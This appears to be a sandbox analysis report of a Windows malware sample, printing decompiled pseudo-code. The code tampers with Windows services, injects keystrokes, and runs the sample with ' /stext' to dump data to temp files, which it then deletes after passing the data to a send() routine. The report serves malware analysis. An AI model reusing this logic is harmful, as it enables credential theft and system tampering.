                      					if(_t11 == 0) {
                      						_push(4);
                      						goto L8;
                      					} else {
                      						_t17 = _t11 - 1;
                      						if(_t17 == 0) {
                      							_push(2);
                      							goto L8;
                      						} else {
                      							if(_t17 == 1) {
                      								_push(3);
                      								L8:
                      								_pop(_t25);
                      							}
                      						}
                      					}
                      					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
                      					CloseServiceHandle(_t31);
                      					CloseServiceHandle(_t28);
                      				} else {
                      					CloseServiceHandle(_t31);
                      				}
                      				E00741EF0();
                      				return _t21;
                      			}

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00755D21,00000000), ref: 007565ED
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00755D21,00000000), ref: 00756601
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00755D21,00000000), ref: 0075660E
                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00755D21,00000000), ref: 00756643
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00755D21,00000000), ref: 00756655
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00755D21,00000000), ref: 00756658
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                      • String ID: !]u
                      • API String ID: 493672254-3920909167
                      • Opcode ID: c1dc0ba29ffd3105280e2474a264316469c7032661000d164712c47f393a524d
                      • Instruction ID: 6fa394190444539991e9959db9c2448913d5399d2ff8f1741cc8ea0b00226658
                      • Opcode Fuzzy Hash: c1dc0ba29ffd3105280e2474a264316469c7032661000d164712c47f393a524d
                      • Instruction Fuzzy Hash: 8A0168312441297AD6209B7C9C4EEBB3B6CDB02372F404306FD25931C0EAAC8E4A81A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0075650F(char _a4) {
                      				struct _SERVICE_STATUS _v32;
                      				void* _t6;
                      				signed int _t16;
                      				void* _t19;
                      				void* _t20;
                      
                      				_t16 = 0;
                      				_t6 = OpenSCManagerW(0, 0, 0x40);
                      				_t1 =  &_a4; // 0x755f36
                      				_t20 = _t6;
                      				_t19 = OpenServiceW(_t20, E00741EEB(_t1), 0x40);
                      				if(_t19 != 0) {
                      					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
                      					CloseServiceHandle(_t20);
                      					CloseServiceHandle(_t19);
                      				} else {
                      					CloseServiceHandle(_t20);
                      				}
                      				E00741EF0();
                      				return _t16;
                      			}

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00755F36,00000000), ref: 0075651E
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00755F36,00000000), ref: 00756532
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755F36,00000000), ref: 0075653F
                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00755F36,00000000), ref: 0075654E
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755F36,00000000), ref: 00756560
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755F36,00000000), ref: 00756563
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID: 6_u
                      • API String ID: 221034970-3270214680
                      • Opcode ID: d9518cc36a666d5d98eeaa7388613eb3a7d6304ed1ac85cf730af24cc84bc8d2
                      • Instruction ID: 9e97a37f4954b20e20e7d7f6b02cb77ac4f89b777ea98ca36ec7fc722e06f62a
                      • Opcode Fuzzy Hash: d9518cc36a666d5d98eeaa7388613eb3a7d6304ed1ac85cf730af24cc84bc8d2
                      • Instruction Fuzzy Hash: F7F0F6755401287BD220FBA89C4AEBF3B6DDB45351F804016FE0993141EF6C8E4686F4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E007563AD(char _a4) {
                      				void* _t5;
                      				signed int _t14;
                      				void* _t17;
                      				void* _t18;
                      
                      				_t14 = 0;
                      				_t5 = OpenSCManagerW(0, 0, 0x10);
                      				_t1 =  &_a4; // 0x756033
                      				_t18 = _t5;
                      				_t17 = OpenServiceW(_t18, E00741EEB(_t1), 0x10);
                      				if(_t17 != 0) {
                      					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
                      					CloseServiceHandle(_t18);
                      					CloseServiceHandle(_t17);
                      				} else {
                      					CloseServiceHandle(_t18);
                      				}
                      				E00741EF0();
                      				return _t14;
                      			}

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00756033,00000000), ref: 007563B9
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00756033,00000000), ref: 007563CD
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,00756033,00000000), ref: 007563DA
                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00756033,00000000), ref: 007563E5
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,00756033,00000000), ref: 007563F7
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,00756033,00000000), ref: 007563FA
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ManagerStart
                      • String ID: 3`u
                      • API String ID: 276877138-2633919695
                      • Opcode ID: 196c83b9ff3525816e6c82d2fdd5df8199d3012ef068222e32f03131ffca747f
                      • Instruction ID: a9212c49d121fb65d9b38f30dc6fb7611d397041d65de4617a334b969edc4626
                      • Opcode Fuzzy Hash: 196c83b9ff3525816e6c82d2fdd5df8199d3012ef068222e32f03131ffca747f
                      • Instruction Fuzzy Hash: 63F0E9351411287FD610AB689CC9DFF3B6DDF413A1B404016FD0583110DF6C8E8795B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E007845EF(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                      				signed int _v8;
                      				int _v12;
                      				void* _v24;
                      				signed int _t49;
                      				signed int _t54;
                      				int _t58;
                      				signed int _t60;
                      				short* _t62;
                      				signed int _t66;
                      				short* _t70;
                      				int _t71;
                      				int _t78;
                      				short* _t81;
                      				signed int _t87;
                      				signed int _t90;
                      				void* _t95;
                      				void* _t96;
                      				int _t98;
                      				short* _t101;
                      				int _t103;
                      				signed int _t106;
                      				short* _t107;
                      				void* _t110;
                      
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t49 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t49 ^ _t106;
                      				_push(__esi);
                      				_t103 = _a20;
                      				if(_t103 > 0) {
                      					_t78 = E007801D9(_a16, _t103);
                      					_t110 = _t78 - _t103;
                      					_t4 = _t78 + 1; // 0x1
                      					_t103 = _t4;
                      					if(_t110 >= 0) {
                      						_t103 = _t78;
                      					}
                      				}
                      				_t98 = _a32;
                      				if(_t98 == 0) {
                      					_t98 =  *( *_a4 + 8);
                      					_a32 = _t98;
                      				}
                      				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                      				_v12 = _t54;
                      				if(_t54 == 0) {
                      					L38:
                      					return E0076FD1B(_v8 ^ _t106);
                      				} else {
                      					_t95 = _t54 + _t54;
                      					_t85 = _t95 + 8;
                      					asm("sbb eax, eax");
                      					if((_t95 + 0x00000008 & _t54) == 0) {
                      						_t81 = 0;
                      						__eflags = 0;
                      						L14:
                      						if(_t81 == 0) {
                      							L36:
                      							_t105 = 0;
                      							L37:
                      							E00770BA0(_t81);
                      							goto L38;
                      						}
                      						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                      						_t121 = _t58;
                      						if(_t58 == 0) {
                      							goto L36;
                      						}
                      						_t100 = _v12;
                      						_t60 = E00782680(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                      						_t105 = _t60;
                      						if(_t105 == 0) {
                      							goto L36;
                      						}
                      						if((_a12 & 0x00000400) == 0) {
                      							_t96 = _t105 + _t105;
                      							_t87 = _t96 + 8;
                      							__eflags = _t96 - _t87;
                      							asm("sbb eax, eax");
                      							__eflags = _t87 & _t60;
                      							if((_t87 & _t60) == 0) {
                      								_t101 = 0;
                      								__eflags = 0;
                      								L30:
                      								__eflags = _t101;
                      								if(__eflags == 0) {
                      									L35:
                      									E00770BA0(_t101);
                      									goto L36;
                      								}
                      								_t62 = E00782680(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                      								__eflags = _t62;
                      								if(_t62 == 0) {
                      									goto L35;
                      								}
                      								_push(0);
                      								_push(0);
                      								__eflags = _a28;
                      								if(_a28 != 0) {
                      									_push(_a28);
                      									_push(_a24);
                      								} else {
                      									_push(0);
                      									_push(0);
                      								}
                      								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                      								__eflags = _t105;
                      								if(_t105 != 0) {
                      									E00770BA0(_t101);
                      									goto L37;
                      								} else {
                      									goto L35;
                      								}
                      							}
                      							_t90 = _t96 + 8;
                      							__eflags = _t96 - _t90;
                      							asm("sbb eax, eax");
                      							_t66 = _t60 & _t90;
                      							_t87 = _t96 + 8;
                      							__eflags = _t66 - 0x400;
                      							if(_t66 > 0x400) {
                      								__eflags = _t96 - _t87;
                      								asm("sbb eax, eax");
                      								_t101 = E0077F98C(_t87, _t66 & _t87);
                      								_pop(_t87);
                      								__eflags = _t101;
                      								if(_t101 == 0) {
                      									goto L35;
                      								}
                      								 *_t101 = 0xdddd;
                      								L28:
                      								_t101 =  &(_t101[4]);
                      								goto L30;
                      							}
                      							__eflags = _t96 - _t87;
                      							asm("sbb eax, eax");
                      							E00790810();
                      							_t101 = _t107;
                      							__eflags = _t101;
                      							if(_t101 == 0) {
                      								goto L35;
                      							}
                      							 *_t101 = 0xcccc;
                      							goto L28;
                      						}
                      						_t70 = _a28;
                      						if(_t70 == 0) {
                      							goto L37;
                      						}
                      						_t125 = _t105 - _t70;
                      						if(_t105 > _t70) {
                      							goto L36;
                      						}
                      						_t71 = E00782680(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                      						_t105 = _t71;
                      						if(_t71 != 0) {
                      							goto L37;
                      						}
                      						goto L36;
                      					}
                      					asm("sbb eax, eax");
                      					_t72 = _t54 & _t95 + 0x00000008;
                      					_t85 = _t95 + 8;
                      					if((_t54 & _t95 + 0x00000008) > 0x400) {
                      						__eflags = _t95 - _t85;
                      						asm("sbb eax, eax");
                      						_t81 = E0077F98C(_t85, _t72 & _t85);
                      						_pop(_t85);
                      						__eflags = _t81;
                      						if(__eflags == 0) {
                      							goto L36;
                      						}
                      						 *_t81 = 0xdddd;
                      						L12:
                      						_t81 =  &(_t81[4]);
                      						goto L14;
                      					}
                      					asm("sbb eax, eax");
                      					E00790810();
                      					_t81 = _t107;
                      					if(_t81 == 0) {
                      						goto L36;
                      					}
                      					 *_t81 = 0xcccc;
                      					goto L12;
                      				}
                      			}
                      0x007846a9
                      0x00000000
                      0x00000000
                      0x007846af
                      0x007846b5
                      0x007846b5
                      0x00000000
                      0x007846b5
                      0x0078467d
                      0x00784681
                      0x00784686
                      0x0078468a
                      0x00000000
                      0x00000000
                      0x00784690
                      0x00000000
                      0x00784690

                      APIs
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00768E1A,?,?,?,00784840,00000001,00000001,?), ref: 00784649
                      • __alloca_probe_16.LIBCMT ref: 00784681
                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00768E1A,?,?,?,00784840,00000001,00000001,?), ref: 007846CF
                      • __alloca_probe_16.LIBCMT ref: 00784766
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007847C9
                      • __freea.LIBCMT ref: 007847D6
                        • Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE
                      • __freea.LIBCMT ref: 007847DF
                      • __freea.LIBCMT ref: 00784804
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                      • String ID:
                      • API String ID: 2597970681-0
                      • Opcode ID: 1597abf3bcb571a56daadee3139adc3674011096d7fe852476502560b0a6e9ba
                      • Instruction ID: bb3ed9897c4fce1df1e0da777b0a577668c0eae14c0d7772cc361a108574ffe6
                      • Opcode Fuzzy Hash: 1597abf3bcb571a56daadee3139adc3674011096d7fe852476502560b0a6e9ba
                      • Instruction Fuzzy Hash: DC51E072660217AFEF25AF60CC89FAB77A9EB41760F154629FC04D6140EBBCDC5087A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 007552BC
                      • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 007552DA
                      • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 007552F7
                      • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00755309
                      • SendInput.USER32(00000001,00000001,0000001C), ref: 00755320
                      • SendInput.USER32(00000001,00000001,0000001C), ref: 0075533D
                      • SendInput.USER32(00000001,00000001,0000001C), ref: 00755359
                      • SendInput.USER32(00000001,?,0000001C,?), ref: 00755376
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: InputSend
                      • String ID:
                      • API String ID: 3431551938-0
                      • Opcode ID: 07469e1e04063f92ccb58a183defdc3ea23f8acf9b0183fccf8db2bcb1f8543c
                      • Instruction ID: 9a5b49cba95b56533d302c830846b850becc2784246b89b1e663d8b5f745be96
                      • Opcode Fuzzy Hash: 07469e1e04063f92ccb58a183defdc3ea23f8acf9b0183fccf8db2bcb1f8543c
                      • Instruction Fuzzy Hash: EC312171D9025CA9FB109BD1CC46FFEBB7CAF18B15F04000AEA04AB1C2D6F995858BE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E00750305(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
                      				char _v5;
                      				char _v6;
                      				char _v7;
                      				char _v12;
                      				char _v36;
                      				char _v60;
                      				char _v84;
                      				char _v108;
                      				char _v132;
                      				char _v156;
                      				char _v180;
                      				char _v204;
                      				char _v228;
                      				char _v252;
                      				char _v276;
                      				char _v300;
                      				char _v324;
                      				char _v348;
                      				char _v372;
                      				char _v396;
                      				char _v420;
                      				char _v444;
                      				char _v468;
                      				short _v988;
                      				void* __ebx;
                      				void* __edi;
                      				void* _t173;
                      				void* _t199;
                      				void* _t225;
                      				void* _t226;
                      				void* _t394;
                      				void* _t399;
                      				void* _t402;
                      				void* _t405;
                      
                      				_t405 = __eflags;
                      				_v12 = 0;
                      				GetModuleFileNameW(0,  &_v988, 0x104);
                      				_v5 = 0;
                      				_v6 = 0;
                      				E007420D5(0,  &_v300);
                      				E007420D5(0,  &_v276);
                      				E007420D5(0,  &_v252);
                      				E0075800F( &_v228, 0x30, E00741F95(E00757093( &_v36)));
                      				E00741FC7();
                      				E0075800F( &_v204, 0x30, E00741F95(E00757093( &_v36)));
                      				E00741FC7();
                      				E0075800F( &_v180, 0x30, E00741F95(E00757093( &_v36)));
                      				E00741FC7();
                      				E00741F95( &_a52);
                      				_t393 = L" /stext \"";
                      				_t224 = E0075432B(E00741EEB(E007430A6(0,  &_v396, E00744429(0,  &_v420, E00744405(0,  &_v444,  &_v988, _t405, E0074427F(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\"")));
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741F95( &_a76);
                      				_t225 = E0075432B(E00741EEB(E007430A6(_t224,  &_v324, E00744429(_t137,  &_v348, E00744405(_t137,  &_v372,  &_v988, _t405, E0074427F(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\"")));
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741F95( &_a100);
                      				_v7 = E0075432B(E00741EEB(E007430A6(_t225,  &_v84, E00744429(_t225,  &_v108, E00744405(_t225,  &_v132,  &_v988, _t405, E0074427F(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\"")));
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				_t399 =  ==  ? 1 : 0;
                      				if(_t225 == 0) {
                      					_t399 = _t399 + 1;
                      				}
                      				if(_v7 == 0) {
                      					_t399 = _t399 + 1;
                      				}
                      				_t226 = DeleteFileW;
                      				_t394 = 0;
                      				L5:
                      				L5:
                      				if(E007579DC(E00741EEB( &_v228),  &_v300) != 0) {
                      					_v12 = 1;
                      					DeleteFileW(E00741EEB( &_v228));
                      				}
                      				if(E007579DC(E00741EEB( &_v204),  &_v276) != 0) {
                      					_v5 = 1;
                      					DeleteFileW(E00741EEB( &_v204));
                      				}
                      				if(E007579DC(E00741EEB( &_v180),  &_v252) != 0) {
                      					_v6 = 1;
                      					DeleteFileW(E00741EEB( &_v180));
                      				}
                      				if(_v12 == 0 || _v5 == 0 || _v6 == 0) {
                      					goto L14;
                      				}
                      				L15:
                      				_t173 = E00745A6F("0");
                      				_t418 = _t173;
                      				if(_t173 == 0) {
                      					E00742F93(_t226, _t402 - 0x18, E00742F93(_t226,  &_v156, E00742F93(_t226,  &_v132, E00742F93(_t226,  &_v108, E00742F93(_t226,  &_v84, E00742FB7( &_v60,  &_a28, 0x7ac238), __eflags,  &_v300), __eflags, 0x7ac238), __eflags,  &_v276), __eflags, 0x7ac238), __eflags,  &_v252);
                      					_push(0x6a);
                      					E00744AA4(_t226, 0x7ac650, _t180, __eflags);
                      					E00741FC7();
                      					E00741FC7();
                      					E00741FC7();
                      					E00741FC7();
                      				} else {
                      					_t199 = E00757226(_t226,  &_v324, _t399);
                      					E00742F1D(_t402 - 0x18, E00742F93(_t226,  &_v156, E00742F93(_t226,  &_v132, E00742F93(_t226,  &_v108, E00742F93(_t226,  &_v84, E00742F93(_t226,  &_v60, E00742F93(_t226,  &_v372, E00742FB7( &_v348,  &_a28, 0x7ac238), _t418,  &_v300), _t418, 0x7ac238), _t418,  &_v276), _t418, 0x7ac238), _t418,  &_v252), _t418, 0x7ac238), _t199);
                      					_push(0x69);
                      					E00744AA4(_t226, 0x7ac650, _t207, _t418);
                      					E00741FC7();
                      					E00741FC7();
                      					E00741FC7();
                      					E00741FC7();
                      					E00741FC7();
                      					E00741FC7();
                      					E00741FC7();
                      				}
                      				E00741FC7();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				E00741FC7();
                      				E00741FC7();
                      				E00741FC7();
                      				E00741FC7();
                      				E00741FC7();
                      				E00741FC7();
                      				E00741FC7();
                      				return E00741FC7();
                      				L14:
                      				Sleep(0x1f4);
                      				_t394 = _t394 + 1;
                      				if(_t394 < 0xa) {
                      					goto L5;
                      				}
                      				goto L15;
                      			}

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00750323
                        • Part of subcall function 00757093: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0074417D), ref: 007570BA
                        • Part of subcall function 0075432B: CloseHandle.KERNEL32(007441F6,?,007441F6,0079F464), ref: 00754341
                        • Part of subcall function 0075432B: CloseHandle.KERNEL32(0079F464,?,007441F6,0079F464), ref: 0075434A
                      • DeleteFileW.KERNEL32(00000000,0079F464,0079F464,0079F464), ref: 007505A8
                      • DeleteFileW.KERNEL32(00000000,0079F464,0079F464,0079F464), ref: 007505D6
                      • DeleteFileW.KERNEL32(00000000,0079F464,0079F464,0079F464), ref: 00750604
                      • Sleep.KERNEL32(000001F4,0079F464,0079F464,0079F464), ref: 0075061D
                        • Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                      • String ID: /stext "
                      • API String ID: 1351907930-3856184850
                      • Opcode ID: 7951c11d3c007d71d26310aae38384bfcbbac26ad9cbcb440fe640d19ce10db8
                      • Instruction ID: cfbf810b66cc94d4b79a0956b561ac759d108f2162ab7704724fa1d9f8ff9718
                      • Opcode Fuzzy Hash: 7951c11d3c007d71d26310aae38384bfcbbac26ad9cbcb440fe640d19ce10db8
                      • Instruction Fuzzy Hash: BED13031914218DBCB19FB60DC9AAEDB375AF55300F8045A9F40AA7192EF785FCECA50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00788CA5(void* __edx, char _a4) {
                      				void* _v8;
                      				void* _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				char _v28;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t53;
                      				void _t57;
                      				intOrPtr _t58;
                      				intOrPtr _t59;
                      				intOrPtr _t60;
                      				intOrPtr _t61;
                      				signed int _t64;
                      				char _t92;
                      				char _t100;
                      				void* _t101;
                      				signed int _t104;
                      				void* _t107;
                      				void* _t121;
                      				char* _t123;
                      				signed int _t127;
                      				intOrPtr* _t132;
                      				void* _t133;
                      				intOrPtr* _t134;
                      				signed int _t135;
                      				signed int _t136;
                      				signed int _t137;
                      				signed int _t138;
                      				char* _t139;
                      
                      				_t121 = __edx;
                      				_t100 = _a4;
                      				_v28 = _t100;
                      				_v24 = 0;
                      				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                      					_v16 = 1;
                      					_t53 = E0077F348(_t101, 1, 0x50);
                      					_v8 = _t53;
                      					if(_t53 != 0) {
                      						_t104 = 0x14;
                      						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                      						_t132 = E0077F98C(0, 4);
                      						_t127 = 0;
                      						_v12 = _t132;
                      						E007801F5(0);
                      						_pop(_t107);
                      						if(_t132 != 0) {
                      							 *_t132 = 0;
                      							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                      								_t133 = _v8;
                      								_t57 =  *0x7aa188; // 0x7aa180
                      								 *_t133 = _t57;
                      								_t58 =  *0x7aa18c; // 0x7ab64c
                      								 *((intOrPtr*)(_t133 + 4)) = _t58;
                      								_t59 =  *0x7aa190; // 0x7ab64c
                      								 *((intOrPtr*)(_t133 + 8)) = _t59;
                      								_t60 =  *0x7aa1b8; // 0x7aa184
                      								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                      								_t61 =  *0x7aa1bc; // 0x7ab650
                      								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                      								L19:
                      								 *_v12 = 1;
                      								if(_t127 != 0) {
                      									 *_t127 = 1;
                      								}
                      								goto L21;
                      							}
                      							_t134 = E0077F98C(_t107, 4);
                      							_v20 = _t134;
                      							E007801F5(0);
                      							if(_t134 == 0) {
                      								L11:
                      								E007801F5(_v8);
                      								E007801F5(_v12);
                      								return _v16;
                      							}
                      							 *_t134 = 0;
                      							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                      							_t135 = E0078B0F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
                      							_t136 = _t135 | E0078B0F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
                      							_v16 = _v8 + 8;
                      							_t137 = _t136 | E0078B0F4(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
                      							_t138 = _t137 | E0078B0F4(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
                      							if((E0078B0F4(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
                      								_t123 =  *_v16;
                      								while( *_t123 != 0) {
                      									_t92 =  *_t123;
                      									if(_t92 < 0x30 || _t92 > 0x39) {
                      										if(_t92 != 0x3b) {
                      											goto L16;
                      										}
                      										_t139 = _t123;
                      										do {
                      											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                      											_t139 = _t139 + 1;
                      										} while ( *_t139 != 0);
                      									} else {
                      										 *_t123 = _t92 - 0x30;
                      										L16:
                      										_t123 = _t123 + 1;
                      									}
                      								}
                      								_t127 = _v20;
                      								_t133 = _v8;
                      								goto L19;
                      							}
                      							E00788C3C(_v8);
                      							_v16 = _v16 | 0xffffffff;
                      							goto L11;
                      						}
                      						E007801F5(_v8);
                      						return 1;
                      					}
                      					return 1;
                      				} else {
                      					_t127 = 0;
                      					_v12 = 0;
                      					_t133 = 0x7aa188;
                      					L21:
                      					_t64 =  *(_t100 + 0x80);
                      					if(_t64 != 0) {
                      						asm("lock dec dword [eax]");
                      					}
                      					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                      						asm("lock xadd [ecx], eax");
                      						if((_t64 | 0xffffffff) == 0) {
                      							E007801F5( *((intOrPtr*)(_t100 + 0x7c)));
                      							E007801F5( *(_t100 + 0x88));
                      						}
                      					}
                      					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                      					 *(_t100 + 0x80) = _t127;
                      					 *(_t100 + 0x88) = _t133;
                      					return 0;
                      				}
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 99b4a4b946344c1b1268f0e55d16b0fb061ff4886bbd53ed8e29850688c7d560
                      • Instruction ID: 663b0d8799d02a647b7ac965a1c72a7883aa8d42aa42b12641650dfa05d24cd3
                      • Opcode Fuzzy Hash: 99b4a4b946344c1b1268f0e55d16b0fb061ff4886bbd53ed8e29850688c7d560
                      • Instruction Fuzzy Hash: 6E611871D80205EFDB60EF68C845BAEBBF4EF49720F504069E954EB281EB74AD41CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E00782E63(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                      				int _v8;
                      				int _v12;
                      				int _v16;
                      				int _v20;
                      				signed int _v56;
                      				char _v268;
                      				intOrPtr _v272;
                      				char _v276;
                      				char _v312;
                      				char _v316;
                      				void* __ebp;
                      				void* _t36;
                      				signed int _t38;
                      				signed int _t42;
                      				signed int _t50;
                      				void* _t54;
                      				void* _t56;
                      				signed int* _t61;
                      				intOrPtr _t71;
                      				void* _t78;
                      				signed int _t85;
                      				signed int _t87;
                      				signed int _t89;
                      				int _t93;
                      				char** _t96;
                      				signed int _t100;
                      				signed int _t101;
                      				signed int _t106;
                      				signed int _t107;
                      				intOrPtr _t116;
                      				intOrPtr _t118;
                      
                      				_t88 = __edi;
                      				_t96 = E007828CD();
                      				_v8 = 0;
                      				_v12 = 0;
                      				_v16 = 0;
                      				_t36 = E0078292B( &_v8);
                      				_pop(_t78);
                      				if(_t36 != 0) {
                      					L19:
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					E0077698A();
                      					asm("int3");
                      					_t106 = _t107;
                      					_t38 =  *0x7aa00c; // 0x67a7e35e
                      					_v56 = _t38 ^ _t106;
                      					 *0x7aa344 =  *0x7aa344 | 0xffffffff;
                      					 *0x7aa338 =  *0x7aa338 | 0xffffffff;
                      					_push(0);
                      					_push(_t96);
                      					_t77 = "TZ";
                      					_t89 = 0;
                      					 *0x7ab748 = 0;
                      					_t42 = E00779895(__eflags,  &_v316,  &_v312, 0x100, "TZ");
                      					__eflags = _t42;
                      					if(_t42 != 0) {
                      						__eflags = _t42 - 0x22;
                      						if(_t42 == 0x22) {
